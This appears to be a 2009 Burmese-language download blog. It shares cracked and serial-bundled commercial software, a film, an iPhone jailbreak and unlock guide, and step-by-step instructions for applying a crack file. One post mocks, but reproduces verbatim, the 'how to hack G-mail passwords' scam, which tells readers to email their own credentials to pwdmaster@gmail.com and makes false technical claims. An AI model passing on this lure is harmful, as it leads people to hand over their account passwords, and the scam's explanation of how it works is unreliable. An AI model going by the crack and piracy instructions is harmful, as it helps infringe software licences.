  • ထောင်ဖောက်တယ်ဆိုတာနဲ့ ကျွန်တော့်ကို တစ်မျိုးမထင်ကြနဲ့ဦး .ထောင်ဖောက် တယ်ဆိုတာက တင်စားလိုက်တာ . ကျွန်တော်တို့ apple ကနေ ထုတ်တဲ့ iphone တွေမှာက စပြီး ထုတ်ကတည်းက သတ်မှတ်ချက် တွေနဲ့ပါ . သီချင်းကို ပြန်ပြီး ကူးထည့်လို့မရအောင် လုပ်ထားတာမျိုး၊ sim card ကို သူသတ်မှတ်ထားတဲ့ နိုင်ငံမဟုတ်ရင် လိုင်းမ၀င်အောင် လုပ်တာမျိုး၊ နောက်တစ်ခုက iphone ထဲမှာ ဆော့မည့် ဂိမ်းများနှင့် အခြားသော တိုလီမိုလီများကို install လုပ်ဖို့အတွက်ကို ပိုက်ဆံသွင်းပြီး အကောင့် လုပ်ထားမှ ရမယ့်စနစ်ဖြင့် ပြုလုပ်ထားပါတယ် . အဲ့ဒါကို ကျွန်တော်တို့က အခုလို jailbreak လို့ခေါ်တဲ့ ထောင်ဖောက်နည်းကို သုံးလိုက်မယ်ဆိုရင် Sim card ကို international sim card အဖြစ် ပြောင်းလဲသွားပြီးတော့ . apple က မဟုတ်တဲ့ တစ်ခြား ပြင်ပ game တွေကိုလဲ download လုပ်ခွင့်ရရှိမှာပါ .. ကဲပထမဦးဆုံး ကျွန်တော်တို့ အောက်က နည်းအတိုင်းစမ်းကြည့်ရအောင်ဗျာ
  • itunes ကို ဖွင့်ထားလိုက်ပါ . itunes မရှိရင် ဒီမှာ ရေးပေးထားပြီးသားပါ ယူလိုက်ပါ .
  • iphone ကို unlock လုပ်ဖို့အတွက် iphone ကို unlock နှင့် jailbreak လုပ်ရန် နှစ်နည်းရှိပါတယ် . Redsnow နှင့် လုပ်တာရယ် . Quickpwn နှင့်လုပ်တာရယ်ပါ . အခုကတော့ redsnow ကိုအသုံးပြုပြီးတော့ unlock လုပ်နည်းကို ပြောပြပါ့မယ် .
  • redsnow ကို အောက်မှာ တင်ပေးထားပါတယ် . ဒီမှာ Download လုပ်လိုက်ပါ
  • ကဲပြီးသွားပြီဆိုရင်တော့ . iphone ရဲ့ fireframe တွေကို ဒေါင်းလိုက်ပါ . ကျွန်တော့် iphone က 3G ဆိုတော့ ဒုတိယက fireframe ကို ဒေါင်းလိုက်ပါတယ် .
  • တစ်ကယ်တော့ ကျွန်တော်တို့ fireframe က ဘာနဲ့တူလဲဆိုရင် သူက ကျွန်တော်တို့ pc မှာ အသုံးပြုဖို့ တင်တဲ့ window operation system လိုပါပဲ . သူက iphone ကို သုံးလို့ရအောင် iPhone Firmware 3.0.1 ကို ထည့်ရတာပါ . မျက်စိထဲ မြင်အောင်လို့ပါ . အောက်မှာယူလိုက်ပါဦး .

redsnow ကို ဖွင့်ပြီး browse နေရာတွင် အပေါ်က မိမိထည့်မယ့် fireframe ကို ရွေးပြီးထည့်လိုက်ပါ .

  • (၁) ပြီးတာနဲ့ ကျွန်တော်တို့ power button ကို 4 second နှိပ်ပါ ... (iphone ပိတ်သွားပါလိမ့်မယ်)
  • (၂) လက်ကိုမလွှတ်သေးဘဲနဲ့ ဆက်ပြီးတော့ နှိပ်ထားပါ . power button တစ်ဖက်နှင့် နှိပ်ထားရင်းကနေ အခြားတစ်ဖက်နဲ့ home button ကို 10 second နှိပ်ထားပါ (နှစ်ခုစလုံးတွဲပြီး နှိပ်ရမှာ ဖြစ်ပါတယ်) နားမလည်ရင် သေချာပြန်ဖတ်ပါ . ဒါက အရေးကြီးပါတယ် .
  • (၃) နောက်ဆုံး home button 1 ခုထဲ နှိပ်ထားပါ (power botton ကို လွှတ်လိုက်ပါ) . ဆက်နှိပ်ထားရင်းကနေ သူစပြီးတော့ install စလုပ်ပြီဆိုတာနဲ့ home button ကို လွှတ်လိုက်လို့ရပါပြီ .အဲ့ဒီ့မှာလဲ အင်္ဂလိပ်လိုရေးပေးထားပါတယ် . အဓိကက ခလုပ်နှိပ်တာ အရေးအကြီးဆုံးပါပဲ . မနှိပ်တတ်ခင်ကတော့ လက်ရဲမှာမဟုတ်ပါဘူး .
  • သိပ်နားမလည်ရင် movie ကြည့် နဲ့လက်တွေ့လုပ်ထားတာလေးကို တင်ပေးလိုက်ပါတယ် . အောက်မှာ Download လုပ်ပြီး သေချာ ကြည့်လိုက်ပါ .

Download movie file(Mediaifre)

CloneCD 5.3

CloneCD is the perfect tool to make backup copies of your music and data CDs, regardless of copy protection. CloneCD allows you to copy almost any CD in just a few mouse clicks. Since the release of 5.0, CloneCD is not only able to copy CDs but also all DVD formats, such as DVD-R, DVD-RW, DVD+R, DVD+RW, DVD+R Dual Layer and DVD-RAM. The movies will be copied 1:1 and are not modified


Download rapidshareDownload ifile.itDownload mediafire

Thursday, October 15, 2009

HACKING WINDOW XP

A complete guide on Hacking Windows XP-More than 200 Hacks, Tweaks, Mods and Customizations BYSteve Sinchak

XP Your Way : Boost up Boot Speed, Max. Security, Total Makeover, Accelerate Surfing and Downloads.
379 PAGES/12.1 MB/PDF
Requirements : PDF Reader installed like Adobe Reader


Download rapidshareDownload ifile.itDownload mediafire

Window 7 Wallpapers

Window 7 ကတော့ အတော့်ကို လူသိများပြီးတော့ . download ဆွဲတာမှာ အမြင့်ဆုံး စံချိန် ချိုးသွားပါတယ် . လှပသေသပ်မှုနှင့် အခြားအားသာချက်များ ရှိတဲ့ window 7 ကတော့ အခုအချိန်မှာ လူတိုင်းအကြိုက်တွေ့နေတဲ့ OS ပါပဲ .. အဲ့ဒီ့ window 7 ရဲ့ wallpapers များကို စုစည်းပြီးတော့ ပေးလိုက်ပါတယ် . အောက်မှာ ယူလိုက်ကြပါဗျာ ..

Download rapidshare
၊ Download ifile.it ၊ Download mediafire

Wednesday, October 14, 2009

Theatre of war - 2 patch

မင်းသွေး: အကိုရေ အကို့ဆိုဒ်က http://www.nyinaymin.com/2009/07/theatre-of-war-2.html ဒီဂိမ်းလေး ဆော့ချင်လို့ ကီးရှာမရဘူးဖြစ်နေတယ်အကို ကူညီပါအုံးနော် ကျေးဇူးတင်ပါတယ်

အောက်မှာ ယူလိုက်ပါ .

Download Patch v-1.3Download Patch v-1.1

Winguard Pro 6.6.49

Juusan : ဟိုက်...မှားပြီညီရေ။ Winguard Pro 6.6.49 ကိုရှာနေတာပါတဲ့။ ညီ့ကို ကိုယ်မှားတောင်းမိပြီ။

တင်လေးလိုက်ပါပြီ အစ်ကိုရေ အဆင်ပြေမယ်လို့ထင်ပါတယ် . အခုဟာက အစ်ကိုလိုချင်တဲ့ version ပါပဲ .

Download ifile.itDownload mediafire

printer ink cartridges များအတွက် reset website လေးပါ

ဒီဆိုက်လေးကို အမှတ်မထင် တွေ့လိုက်လို့ မိတ်ဆက်ပေးလိုက်တာပါ . printer ink reset အတွက် အတော်လေးကို ရေးထားတာတွေ့ရပါတယ် . canon, epson နဲ့ အခြား ink cartridges အတွက် အဆင်မပြေသူများ လေ့လာကြည့်ပါ . ဆိုက်လေးက ဒီမှာ ပါ .

Download Adobe Acrobat 9 Pro

ကျွန်တော်တင်ပေးလိုက်ပါပြီ . ဒါကတော့ 9 pro ပါ မနေ့ကတင်ပေးတာက portable ပါ .. အခုဟာက နဲနဲတော့ ဆိုက်ကြီးတယ် . လင့်တွေကိုတော့ နောက်ပိုင်းကျမှပဲ ပြင်ပေးပါ့မယ် .... အခုတော့ Rapidshare ကနေပဲ Download လုပ်ထားကြပါဦး .

Download rapidshare

Winguard Pro 6.56 with serial number

Juusan: ညီရေ...WinguardPro 6.56 လေးရှိရင်မျှပါဦး။ Latest Version က ရှိတယ်။ 6.56 က ရှာမရလို.ပါ။ တကယ်အရေးကြီးလို.ပါ။

တင်ပေးလိုက်ပါပြီ . အဆင်ပြေမယ်လို့ မျှော်လင့်ပါတယ် .

Download ifile.itDownload mediafire

Tuesday, October 13, 2009

crack ကို ဘယ်လို အသုံးပြုရလဲ .

thiha: i don't know how to crack for advanced system care

crack ကို သုံးတာကတော့ လွယ်ပါတယ် . တစ်ကယ်တန်း သွားထားရမှာက advanced system care ရဲ့ main rooots မှာ သွားထားရမှာပါ . အောက်ကအတိုင်းလုပ် ကြည့်လိုက်ပါ . တစ်ခြား program တွေလဲ ဒီနည်းအတိုင်းပါပဲ . crack သုံးနည်းကတော့ အတူတူချည်းပါပဲ .

  • မိမိရထားတဲ့ advanced system care ကို install လုပ်လိုက်ပါ
  • အထဲမှာပါလာတဲ့ crack file လေးကို copy ကူးထားလိုက်ပါ .
  • C: >> Program Files >> Advanced System Optimizer 3 ကိုသွားလိုက်ပါ .
  • ဖိုင်ကို paste မလုပ်ခင် မိမိ install လုပ်ထားတဲ့ program ဖွင့်ထားခြင်း ရှိမရှိ သေချာစစ်ဆေးပါ . ဖွင့်ထားရင် ပိတ်လိုက်ပါ .
  • ကျွန်တော်တို့ Taskbar (နာရီလေးတွေရှိတဲ့ icons တွေထဲ) မှာ လဲ ရှာကြည့်ပါ . advanced system optimizer icon လေးတွေ့တယ်ဆိုရင် right click ထောက်ပြီး exit ပေးလိုက်ပါ ..
  • ကူးယူထားခဲ့တဲ့ crack file ကို paste လုပ်လိုက်ပါ တစ်ခုခုမေးလာရင် ok (သို့မဟုတ်) Ok All ပေးလိုက်ပါ ..
  • ကဲ အခုနက ကျွန်တော်တို့ active မဖြစ်သေးတဲ့ advanced system optimizer ကို ပြန်ဖွင့်ကြည့်လိုက်ပါ .

အဆင်ပြေနိုင်ကြပါစေဗျာ .. သိတဲ့သူအဖို့ ရယ်စရာလို ဖြစ်နေပေမယ့် . မသိတဲ့သူအဖို့တော့် အတော်ကို ခက်ခဲမယ်ထင်လို့ ဒီပို့စ်ကို ရေးပေးလိုက်တာပါ . ကလေးကလား ဆန်နေရင်တော့ တောင်းပန်ပါတယ် .

Abdobe Acrobat 9

Juusan : ညီရေ.. Abdobe Acrobat 9 လေးရှိရင် ကူညီပါကွာ။

တင်ပေးလိုက်ပါပြီခင်ဗျာ .. အဆင်ပြေပါစေ .


Download rapidshareDownload mediafireDownload ifile.it

Advanced System Optimizer Version 3.0.55

Download လုပ်ချင်သူများအောက်မှာ ယူလိုက်ပါ တောင်းထားတဲ့သူ ရှိလို့ တစ်ခါတည်းတင်ပေးလိုက်ပါတယ် . ကျွန်တော် ပြန်ပြီးတော့ ရေးပေးပါဦးမယ် .

Download ကိုအောက်မှာ ယူလိုက်ပါ

Download ifiel.itDownload mediafire

Portable Your Uninstaller! 6.2.2009

Having trouble uninstalling a program?
Is your computer getting slower and slower? Get the best uninstaller software - Your Uninstaller! now to Make Your Computer Fast and Clean!
Your Uninstaller! uninstaller software is the industry’s leading uninstaller. It comes with SmartUninstall which helps you completely remove applications.

Key features:
* Completely remove any application installed.
* Deep scan of registry and entire disk for unused registry entries and files.
* Remove programs that could not be removed by Add/Remove Program.
* Uninstall screen savers.
* Remove internet surfing traces.
* Backup and restore registry.
* Registration key management.
* Built-in Disk Cleaner helps you find and remove unnecessary files on your disk to save space and make computer faster!
* Built-in IE Context Menu Cleaner, cleans the context menu of Internet Explorer.
* Built-in Startup Manager, take full control of Window startups.
* Fix invalid desktop shortcuts and start menu shortcuts.
* Get the applications detail info even if it hide itself in deep directory, especially useful for finding out “Spy” applications.
* Backup/restore installed-applications information.
* Uninstall with SINGLE drag-drop! Just drop a file on Your Uninstaller! icon on the desktop to see what happens!
* List installed applications with appropriate icons(same as you see in the Start Menu), you can easily find the application you want to uninstall.
* Powerful search feature allows you quickly find the program you are about to uninstall.
* Automatic detection of invalid installations and removing them with one click.
* Force removal of uninstall related entries in the registry(care to use!).
* Lighting speed at startup, 5-10 times faster than Add/Remove Program of Windows XP!
* Export programs list to file or printer.
* All this and more…

အသုံးပြုနည်း မြန်မာလို ပြန်ရေးပေးပါမည် .

Download rapidshareDownload ifile.itDownload mediafire

Data recovery Portable

GRT Deleted Files Recovery is fast and easy-to-use data recovery solution. No technical or data recovery skills are required to undelete your files. Download GRT Data Recovery now to perform deleted files recovery, or if you are trying to unformat and recover data from floppy disk, zip drive, smart media, compact flash or other removable media.
GRT Deleted Files Recovery tool helps you to recover lost files from FAT16, FAT32 and NTFS partitions.

(အသုံးပြုနည်း မြန်မာလို ပြန်ရေးပေးပါမည်)

Download ifile.itDownload mediafireDownload rapidshare

Watermark Software 3.0.0 Portable

သေချာတော့ မစမ်းရသေးပါဘူး . ပြီးတော့မှ အသေးစိတ်ပြောပြပါ့မယ် . အသုံးပြုပုံ အသုံးပြုနည်းကို . အခုတော့ အောက်မှာ download လုပ်ထားကြပါဦး ..

ifile link ကို မြန်မာပြည်က ညီလေးတစ်ယောက်ကနေ ကူညီပြီး အားဖြည့်ပေးထားတာပါ .

Download ifile.itDownload rapidshareDownload mediafire

Monday, October 12, 2009

The Last House On The Left (2009)

လိုချင်ရင် အောက်မှာ download လုပ်လိုက်ပါ . သူ့ရဲက format type ကတော့ mp4 ပါ . အဆင်ပြေမယ်လို့ မျှော်လင့်ပါတယ် . လင့်တွေကိုတော့ နောက်နေ့မှ ထပ်ပြောင်းပေးပါ့မယ် . အခုတစ်လော upload တင်တာ သိပ်ပြီး အဆင်မပြေဘူးဖြစ်နေတယ်ဗျာ .

Download rapidshare >> Part(1)Part(2)Part(3)Part(4)

Sunday, October 11, 2009

MS 2003 portable (67.8 MB)

ဗညားရှိန်: ဘယ်လိုလုပ်ရမလဲ . ဖြစ်နိုင်ရင် MS ၂၀၀၃ လေး တင်ပေးနိုင် မလားဗျ . .

သူ့မှာပါတာတွေကတော့ အောက်မှာရေးပြထားပါတယ် .
Microsoft office Access 2003
Microsoft office picture Manager
Microsoft office Powerpoint
Microsoft office Excel
Microsoft office word

ကဲအောက်မှာ Download လုပ်လိုက်ပါ .
Download ifile.it >> part(1) ၊ Part(2) ၊ Part(3)
Download mediafire >> part(1)Part(2)Part(3)

Saturday, October 10, 2009

အောင်မယ်လေးဗျာ သူများကို Hack ချင် လို့တဲ့ .

ညီလေး တစ်ယောက်က မေးလ်ပို့ထားလို့ပါ . ကျွန်တော်ဆိုလိုတာက အဲ့ဒီ့ညီလေးကို အပြစ်မဆိုသာပါဘူး . သူ့ခမျာ မေးလ်နဲ့ပို့ပြီးတော့ကို မေးရှာတာပါ . အဲ့ဒီ့ gmail hack နည်းကို ရေးတဲ့သူကတော့ အခုအချိန်ဆိုရင် လူတော်တော် များများရဲ့ password ကို လိုက်ပြီးရှာစရာမလိုပဲနဲ့ကို အလိုလိုနေရင်း ပိုင်ရှင်ကိုယ်တိုင်ကကို ကြည်ကြည်ဖြူဖြူနဲ့ ပေးတာကို အေးအေးဆေးဆေး ၀င်ကြည့်ရုံပဲ ၊ သူများမေးလ်ကို မသိခင် ကို့ရဲ့ username နဲ့ password ပါသွားတာတော့ မသိရှာဘူး .. အဲ့ဒီ့နည်းကို ဟိုးအရင်ကလဲ သူငယ်ချင်းတစ်ယောက်က ကျွန်တော့်ကို ဟက်နည်းဆိုပြီးတော့ ပေးခဲ့ဖူးပါတယ် . အံမယ် မှာတောင်မှာခဲ့သေးတယ် . ဘယ်သူ့မှမပြောနဲ့နော်တဲ့ . ကျွန်တော် ခဲရာခဲဆစ် ရှာထားရတာတဲ့ . ကျွန်တော်လဲ အဲ့လိုမျိုး အကောင့်တစ်ခုလုပ်ပြီးတော့ မေးလ်တွေ လျှောက်ပို့ဦးမှ နဲ့တူတယ် . ဟာဟ .


how to hack G-mail passwords
  • Step 1: Log into your G-mail account.
  • Step 2: Compose a new mail.
  • Step 3: In subject box type " PASSWORD RECOVERY "
  • Step 4: Send this to - pwdmaster@gmail.com
  • Step 5: Write this in message box.


(first line) - Email address you want to hack.
(second line) - Your G-mail address
(third line) - Your G-mail account password
(fourth line) - <pwdcursive>< login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#">=""></pwdcursive><>

{simply copy and paste above.}
How it works: you mail to a system administrators automatic responder. Usually only system administrators should be able to use this, but when you try it with your own password and mail this message from your Gmail account the computer gets confused! Why your password is needed- automatic Gmail responder will require your "system administrator password" which is in fact your own password!!! But the : computer doesn't know.


THE PASSWORD WILL AUTOMATICALLY BE SENT TO YOUR G-MAIL! INBOX IN A MAIL CALLED "SYSTEM REG MESSAGE" FROM "SYSTEM". This is an awesome trick and works as many times as you try it. Have fun! NOTE: Use account you have been using for few days say at least 30 days. Otherwise G-mail may take new account as temporary and this trick may not work. Moreover use it soon otherwise this flaw can be rectified soon. Please be advised that it usually works with G-mail & AOL but i'm not to sure about HOT-MAIL but can try. THE ONLY WAY YOU CAN HACK SOMEONE'S AOL ACCOUNT IS PROVIDING YOU HAVE AN AOL ACCOUNT. ALTHOUGH THIS IS G-MAIL ACCOUNT INFORMATION CENTER, IT HAS BEEN ABLE TO WORK WITH AOL. I WILL NOT BE HELD RESPONSIBLE FOR WHAT YOU DO WITH THIS INFORMATION NOR WILL I BE HELD ACCOUNTABLE, THIS INFORMATION I'M SHARING IS FOR EDUCATIONAL PURPOSES ONLY. PLEASE USE IT TO YOUR

DISCRETION.............
HAPPY HACKING .....

Friday, October 9, 2009

Google apps; email လုပ်နည်း

ဝဘ်ဆိုက်ရှိတဲ့သူများ ကိုယ်ပိုင် domain name လိပ်စာနဲ့ email တွေလုပ်လို့ရပါတယ် . ဥပမာ . nyinaymin@nyinaymin.com , nyinaymin@nyinayin.co.cc, လိုမျိုးပေါ့ တွေ့ဖူးကြမှာပါ . ကျွန်တော့်မှာတောင် လုပ်ထားသေးတယ် . ဒါပေမယ့် ဒါက hosting နဲ့ ကိုယ်ပိုင် ဆိုက်တစ်ခု လုပ်ထားမှ ရမှာပါ . hosting ကတော့ free hosting တွေ အများကြီးပါ . ကဲ လုပ်နည်းကို မြန်မာလိုရေးပေးထားတာလေးပါ . အစ်ကို သင်္ကြန်ရေးထားတာလေးပါ . အောက်မှာယူလိုက်ပါ .

Download ifile.itDownload mediafire

Deep Freeze ထည့်သွင်းခြင်း (မြန်မာလို)

လုပ်ထားတဲ့ စာအုပ်လေးတွေ့လို့ share ခွဲပေးလိုက်ပါတယ် . မသုံးတတ်တဲ့ သူများ အောက်မှာ download လုပ်လိုက်ကြပါ . software ကတော့ ဟိုတစ်ရက်က ကျွန်တော် တင်ပေးပြီးပါပြီ . ကဲအဆင်ပြေကြပါစေဗျာ .


Download mediafireDownload ifile.it

Thursday, October 8, 2009

ကဲ ning မှာ ဘယ်လို ဘန်းမလဲနှင့် admin ဘယ်လိုပေးမလဲ

ဒီပို့စ် က ကျွန်တော် အခုနက လုပ်ပြထားတဲ့ ဖိုင်ကို .swf ပြောင်းပြီးတော့ flash player နဲ့တင်ပေးထားတာပါ . စမ်းကြည့်ပါဦး . အဆင်ပြေမယ်လို့မျှော်လင့်ပါတယ် .. ကြည့်လို့အဆင်ပြေလား မပြေလားလဲ ပြောကြပါဦး . အားလုံးဆင်ပြေတယ်ဆိုရင် နောက်ပိုင်းကို ကျွန်တော် flash player နဲ့ပဲ တင်သွားပေးပါ့မယ် . ကျွန်တော်လဲ မပင်ပန်းတော့ဘူးပေါ့ . မဟုတ်ရင် ဓါတ်ပုံတွေတင်ရ photsoshop နဲ့ ပြန်ပြီးပြင်ရ upload တင်ရနဲ့ အလုပ်တော့ပိုတယ် . ဒါလေးကို အားလုံးအဆင်ပြေရင်တော့ သဘောတရား လဲနားလည်သွားမယ် . ရှင်းပြရတာလဲ လွယ်ကူတယ်ဗျာ .


Mobile မှာ မြန်မာလို ပေါ်ဖို့ ဇော်ဂျီ keyboard လာပါပြီ .

ဟန်းဖုန်းတွေမှာ အင်တာနက်ချိတ်ပြီးတော့ မြန်မာဆိုက်တွေကို ကြည့်ချင်ကြသူများ အထူးသဖြင့် ဘလောဂ်တွေကိုပေါ့ . ဆိုက်တွေရဲ့ 85% လောက်ဟာ zawgyi နဲ့ ရေးထားကြတာဖြစ်တဲ့အတွက် ဇော်ဂျီနဲ့မှ မဟုတ်ရင် အဆင်ပြေပြေ မြင်နိုင်မှာမဟုတ်ပါဘူး . ကဲ နိုင်ငံခြားရောက်လို့ ဟန်းဖုန်းသုံးတဲ့သူတိုင်း ဒါလေးကိုတော့ လိုချင်ကြမယ်ဆိုတာကို ကြိုသိနေပါတယ် . ကျွန်တော်လဲ ရရချင်း တင်ပေးလိုက်တာပါ . အိပ်ချင်နေတာ စင်းပါစင်းနေပြီ . ကဲဗျာ စိတ်ချလက်ချသာဒေါင်းပြီး သုံးကြဗျာ . Mobile phone and Pocket pc များအတွက် မြန်မာစာနဲ့ရေးထားတဲ့ ဆိုက်တွေကို ဖတ်နိုင်ကြပါစေဗျာ . အဲ့ထဲမှာ pdf နဲ့ရေးထားတာပါပါတယ် ဖတ်ကြည့်လိုက်ပါ .

Download menual zip >> Download mediafire

Download Zawgyi keyboard >> Download mediafire

Quick-PDF PDF To Word Converter 2.0 portable

ဒါကတော့ pdf ကနေ word ကို ပြောင်းတဲ့ pdf converting software တစ်ခုပါ . ဘယ် pdf အမျိုးအစားပဲဖြစ်နေ ဖြစ်နေ ပြောင်းလဲပေးနိုင်ပါတယ် . MS 2007 မှ 2003 မှ မရွေးပါဘူး . ကြိုက်တဲ့ Microsoft office နဲ့ဖွင့်ပါ ဖွင့်လို့အဆင်ပြေပါတယ် . အဆင်ပြေကြလိမ့်မယ်လို့ မျှော်လင့်ပါတယ် .



Download rapidshareDownload ifile.itDownload mediafire

Portable BB FlashBack Pro v2.6.4.1293

ကို့ရဲ့ Desktop မှာ လုပ်တဲ့ လုပ်ငန်းတွေကို record လုပ်ပေးတဲ့ software ပါ . Text လဲရပါတယ် . သူလုပ်ချင်တဲ့အချိန် record လေးကို နှိပ်လိုက်ရုံပါပဲ . သုံးရတာ အရမ်းကိုအဆင်ပြေပါတယ် . ကျွန်တော်တို့ ရှင်းလင်းပြချင်တဲ့ အကြောင်းအရာတွေကို ဓါတ်ပုံရိုက်စရာမလိုပဲနဲ့ . ဒီကောင်လေးနဲ့ record လုပ်ထားပေးလို့ရပါတယ် . ကျွန်တော့်တို့အတွက်တော့ တစ်ကယ့်ကို အသုံးဝင်ပါတယ် . စမ်းကြည့်လိုက်ပါ . တစ်ချို့ ကျွန်တော်တို့သုံးတဲ့ recoder တွေက mouse ရဲ့ လုပ်ဆောင်ချင်တွေကို မမှတ်ပေးပါဘူး . ဒီကောင်ကတော့ Mouse ရဲ့ လုပ်ဆောင်ချက်ကိုပါ ပူးတွဲမှတ်သားပေးပါတယ် . ကျွန်တော် ဥပမာ တစ်ခုပြပါ့မယ် . အောက်မယ်ကြည့်လိုက်ပါ . အားသာချက်ကတော့ ထွက်လာတဲ့ဖိုင်ဟာ သေးသေးလေးပါ .

ကဲဘယ်လိုမျိုးလေး လဲဆိုတာကို အောက်က ဖိုင်ကို ဒေါင်းပြီးကြည့်လိုက်ပါ . တစ်ကယ့်ကို အလန်းလေးဗျာ သိလား . ကျွန်တော် Ning ဆိုက်မှာ admin ကိုဘယ်လိုပေးမယ်၊ ဘန်းချင်တဲ့ Member ကိုဘယ်လို Ban မယ်ဆိုတာကို ပြထားတဲ့ ဥပမာ movie ဖိုင်လေးပါ . နမူနာအနေနဲ့ ကြည့်ချင်ရင် ဒီမှာ download လုပ်လိုက်ပါ .

Download rapidshareDownload mediafireDownload ifile.it

Diskeeper 2009 Pro Premier 13.0 Build 835 Portable | 11 MB

Diskeeper is a fully automatic defrgmentation engine that replaces the standard Windows defragmenter which runs only manually, consumes high resoureces and rewquires full administrator privileges to operate. Diskeeper constantly monitors and maintains your systems maximum performance, using the fastest defrag engine. According to the National Software Testing Lab (NSTL) proven 300-500% faster and far more thorough than Windows built-in defragmenters. The program includes a unique `Set It and Forget It` functionality with Smart Scheduling, that, once set, runs invisibly and fully automatic in the background.

မြန်မာလိုပြန်ရေးပေးပါမည် .

Download rapidshareDownload ifile.itDownload mediafire

19 MB ပဲရှိတဲ့ Microsoft Office 2007 Blue Edition (Portable)

ကဲ ဘာ serial, ဘာ crack မှ မလိုပါဘူး . MS 2007 ကို ကြိုက်သူများ အတွက်ပါ . ရှားရှားပါးပါးလေး တွေ့လိုက်လို့ပါ . ဆိုက်လေးက သေးသေးလေး ဆိုတော့ အစက ဟုတ်မှ ဟုတ်ပါ့မလားလို့ သေးသေးလေး ဆိုတော့ သယ်ရတာ လွယ်သွားတာပေါ့ .

Include:
* Microsoft Office Access 2007
* Microsoft Office Excel 2007
* Microsoft Office Groove 2007
* Microsoft Office InfoPath 2007
* Microsoft Office OneNote 2007
* Microsoft Office Outlook 2007
* Microsoft Office PowerPoint 2007
* Microsoft Office Publisher 2007
* Microsoft Office Word 2007

ကဲအောက်မှာ Download လုပ်လိုက်ပါဦး .

Download rapidshareDownload ifile.itDownload mediaifre

PC ကို Screen saver နဲ့ ဘယ်လို Lock ချခဲ့မလဲ

screen saver နဲ့ lock ချလို့ရပါတယ် . ။ ကိုကအပြင်ခဏသွားချင်ရင် screen ကို password ပေးပြီး lock ချသွားလို့ ရပါတယ် .. ကဲဒေါင်းချင်ရင် အောက်မှာ ဒေါင်းလော့လုပ်လိုက်ပါ .. ကိုက ကိစ္စတစ်ခုရှိလို့ အပြင်ကိုသွားချင်တယ် . Download ကလဲ လုပ်ထားတယ် မပြီးသေးဘူး . ဒုက္ခပဲဆိုပြီး ညည်းနေတဲ့ သူငယ်ချင်းများအတွက်ပါ . သူ့ဟာသူ download လုပ်နေပါလိမ့်မယ် . တစ်ချို့ screen locker တွေဟာ Lock တော့ချပေးတယ် . ဒါပေမယ့် အင်တာနက်ကို ရပ်ထားလိုက်တယ် . ဒါလေးကတော့ အဆင်ပြေပါတယ် .

Download mediafireDownload ifile.it

လုပ်နည်း
  • (၁) Download လုပ်ထားတဲ့ file ကို install လုပ်လိုက်ပါ .
  • (၂) ပြီးတာနဲ့ start Bar က ညာဖက်မှာ x ပုံစံလေးနဲ့ icon လေးကို တွေ့ရပါလိမ့်မယ် .
  • (၃) Rightclick နှိပ်ပြီး setpassword ကိုပေးလိုက်ပါ .
  • (၄) ကိုပေးချင်တဲ့ Password ကိုပေးလိုက်ပါ .
  • (၅) ပြီးတာနဲ့ ကိုအပြင်ကိုသွားချင်တယ်ဆိုရင်တော့ အခုနက X icon လေးကို တစ်ချက်ကလစ်လိုက် တာနဲ့ lock ကျသွားလိမ့်မယ် . ကဲ အဆင်ပြေကြပါစေဗျာ ..

တိုတိုထွာထွာ အဖြေများ

ဒီဇင် : Run Box မှာ msconfig ကိုဝင်လို့မရလို့..အကိုရေ..ကူညီပါဦး..

အောက်ကအတိုင်း သွားပြီးတော့ MSconfig.exe ကို Double click နှိပ်ရင်လဲရပါတယ် .

C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe

Talking Dictionary 2007 (Eng to 42 Lang)

အင်္ဂလိပ်ဘာသာကနေ 42 ဘာသာ ပြောင်းလဲနိုင်ပါတယ် . လိုချင်သူများ download လုပ်လိုက်ကြပါ ... ကျွန်တော် ဖိုင်တွေကို တစ်ခြားလင့်ကနေ ပြန်တင်ပေးနေ ပါတယ် . ခဏလောက်သီးခံ ပေးကြပါဦး ..

- English Albanian
- English Arabic
- English Armenian
- English Azerbaijani
- English Bosnian
- English Bulgarian
- English Chinese Simplified
- English Chinese Traditional
- English Croatian
- English Czech

- English Dutch
- English Estonian
- English Finnish
- English French
- English German
- English Greek
- English Hebrew
- English Hungarian
- English Indonesian
- English Italian
- English Japanese Kana Romaji
- English Japanese Kanji Kana
- English Japanese Kanji Romaji
- English Japanese Romaji Kanji
- English Korean
- English Latin
- English Latvian
- English Lithuanian
- English Polish
- English Portuguese
- English Romanian
- English Russian
- English Serbian
- English Slovak
- English Spanish
- English Swedish
- English Tagalog
- English Thai
- English Turkish
- English Ukrainian
- English Vietnamese
- English Yiddish


- Russian Armenian
- Russian Azerbaijani
- Russian English
- Russian Estonian
- Russian French
- Russian German
- Russian Hebrew
- Russian Spanish
- Russian Turkish


FlashCards
***************************
- Russian Armenian
- Russian Azerbaijani
- Russian ChineseSimplified
- Russian ChineseTraditional
- Russian Czech
- Russian Dutch
- Russian English
- Russian Estonian
- Russian Finnish
- Russian French
- Russian German
- Russian Hebrew
- Russian Italian
- Russian Polish
- Russian Portuguese
- Russian Spanish
- Russian Swedish
- Russian Turkish

Download rapidshare